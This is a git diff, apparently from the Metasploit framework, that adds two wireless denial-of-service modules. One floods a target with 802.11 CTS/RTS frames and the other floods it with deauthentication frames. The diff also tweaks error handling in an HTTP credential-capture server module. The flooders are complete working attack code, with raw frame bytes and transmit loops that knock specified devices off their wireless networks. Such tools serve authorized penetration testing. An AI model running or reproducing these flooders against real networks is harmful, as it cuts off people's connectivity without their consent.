diff --git a/modules/auxiliary/dos/wireless/cts_rts_flood.rb b/modules/auxiliary/dos/wireless/cts_rts_flood.rb new file mode 100644 index 0000000000..a4a6a709b1 --- /dev/null +++ b/modules/auxiliary/dos/wireless/cts_rts_flood.rb @@ -0,0 +1,76 @@ +require 'msf/core' + +module Msf +class Auxiliary::Dos::Wireless::CTSRTSFLOOD < Msf::Auxiliary + + include Exploit::Lorcon + + def initialize(info ={}) + super(update_info(info, + 'Name' => 'Wireless CTS/RTS Flooder', + 'Description' => %q{ + This module sends 802.11 CTS/RTS requests to a specific wireless peer, + using the specified source address, + }, + + 'Author' => [ 'Brad Antoniewicz' ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision$' + )) + register_options( + [ + OptString.new('ADDR_DST',[true, "TARGET MAC (e.g 00:DE:AD:BE:EF:00)"]), + OptString.new('ADDR_SRC',[false, "Source MAC (not needed for CTS)"]), + OptString.new('TYPE',[true,"Type of Frame (RTS, CTS)",'RTS']), + OptString.new('NUM',[false, "Number of frames to send",'100']) + ],self.class) + end + + def run + case datastore['TYPE'].upcase + when 'RTS' + if (!datastore['ADDR_SRC']) + print_status("FAILED: RTS Flood selected but ADDR_SRC not set!") + return + end + frame = create_rts() + when 'CTS' + + frame =create_cts() + else + print_status("No TYPE selected!!") + return + end + + open_wifi + print_status("Sending #{datastore['NUM']} #{datastore['TYPE'].upcase} frame.....") + + 0.upto(datastore['NUM'].to_i) do + wifi.write(frame) + end + + end + def create_rts + + frame = + "\xb4" + # Type/SubType + "\x00" + # Flags + "\xff\x7f" + # Duration + eton(datastore['ADDR_DST']) + # dst addr + eton(datastore['ADDR_SRC']) # src addr + + return frame + end + def create_cts + + frame = + "\xc4" + # Type/SubType + "\x00" + # Flags + "\xff\x7f" + # Duration + eton(datastore['ADDR_DST']) # dst addr + + return frame + end +end +end + diff --git a/modules/auxiliary/dos/wireless/deauth.rb b/modules/auxiliary/dos/wireless/deauth.rb new file mode 100644 index 0000000000..49956ee947 --- /dev/null +++ b/modules/auxiliary/dos/wireless/deauth.rb @@ -0,0 +1,62 @@ +require 'msf/core' + +module Msf +class Auxiliary::Dos::Wireless::DEAUTH_Flood < Msf::Auxiliary + + include Exploit::Lorcon + + def initialize(info ={}) + super(update_info(info, + 'Name' => 'Wireless DEAUTH Flooder', + 'Description' => %q{ + This module sends 802.11 DEAUTH requests to a specific wireless peer, + using the specified source address and source BSSID. + }, + + 'Author' => [ 'Brad Antoniewicz' ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision$' + )) + register_options( + [ + OptString.new('ADDR_DST',[true, "TARGET MAC (e.g 00:DE:AD:BE:EF:00)"]), + OptString.new('ADDR_SRC',[true, "Source MAC (e.g 00:DE:AD:BE:EF:00)"]), + OptString.new('ADDR_BSS',[true, "BSSID (e.g 00:DE:AD:BE:EF:00)"]), + OptString.new('NUM',[false, "Number of frames to send",'100']) + ],self.class) + end + + def run + + print_status("Creating Deauth frame with the following attributes:") + print_status("\tDST: #{datastore['ADDR_DST']}") + print_status("\tSRC: #{datastore['ADDR_SRC']}") + print_status("\tBSSID: #{datastore['ADDR_BSS']}") + + open_wifi + + print_status("Sending #{datastore['NUM']} frames.....") + + 0.upto(datastore['NUM'].to_i) do + wifi.write(create_deauth()) + end + close_wifi + end + + def create_deauth + + seq = [rand(255)].pack('n') + frame = + "\xc0" + # Type/SubType + "\x00" + # Flags + "\x3a\x01" + # Duration + eton(datastore['ADDR_DST']) + # dst addr + eton(datastore['ADDR_SRC']) + # src addr + eton(datastore['ADDR_BSS']) + # BSSID + seq + # sequence number + "\x07\x00" # Reason Code (nonassoc. sta) + return frame + end +end +end + diff --git a/modules/auxiliary/server/capture/http.rb b/modules/auxiliary/server/capture/http.rb index 941f07a6fb..d3e7b2d70b 100644 --- a/modules/auxiliary/server/capture/http.rb +++ b/modules/auxiliary/server/capture/http.rb @@ -70,6 +70,7 @@ class Auxiliary::Server::Capture::HTTP < Msf::Auxiliary end def on_client_data(cli) + begin data = cli.get_once(-1, 5) case cli.request.parse(data) @@ -82,12 +83,12 @@ class Auxiliary::Server::Capture::HTTP < Msf::Auxiliary close_client(cli) end rescue ::EOFError, ::Errno::EACCES, ::Errno::ECONNABORTED, ::Errno::ECONNRESET + rescue ::OpenSSL::SSL::SSLError rescue ::Exception print_status("Error: #{$!.class} #{$!} #{$!.backtrace}") end - close_client(cli) - + close_client(cli) end def close_client(cli)